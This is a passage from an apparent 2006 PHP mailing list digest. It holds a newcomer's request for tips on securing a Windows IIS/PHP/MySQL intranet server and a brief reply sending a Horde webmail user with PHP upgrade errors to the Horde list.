permissions needed that can only access say from the localhost.
</assumption>

-----Original Message-----
From: H. Dan Phillips [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, November 14, 2006 1:44 AM
To: php-general@lists.php.net
Subject: [PHP] server side security

Let me begin by saying I'm a newbie to PHP and open source. I setup a
windows 2003 server with IIS6, PHP 5x and MYSQL5x for one of our
developers to start building a new web based application. The developer
will be using PHP myadmin for his purposes. The settings that were used
were ones posted out on many web sites for this combo. I'm looking for
detailed instructions to secure the server from the standpoint of the
server OS, php.ini and mysql. The developer will be securing access to
the application from his end but I want to make sure that the server
also remain secure. It will only be used within our intra-net and only
by a handful of people. Any and all suggestions will be greatly
appreciated.

Thks Dan Phillips

--- End Message ---
--- Begin Message ---
Norbert Ehart wrote:
hello,

i have some problem with horde, after my isp have upgraded php on my vps! i only get some error messages.


Notice: Only variable references should be returned by reference in /usr/share/horde3/lib/Horde/Perms.php on line 343

Notice: Only variable references should be returned by reference in /usr/share/horde3/lib/Horde/Auth.php on line 1193

Warning: Cannot modify header information - headers already sent by (output started at /usr/share/horde3/lib/Horde/Perms.php:343) in /usr/share/horde3/index.php on line 51

Talk to the horde mailing list / forum. They need to fix this properly.

--
Postgresql & php tutorials
http://www.designmagick.com/

--- End Message ---
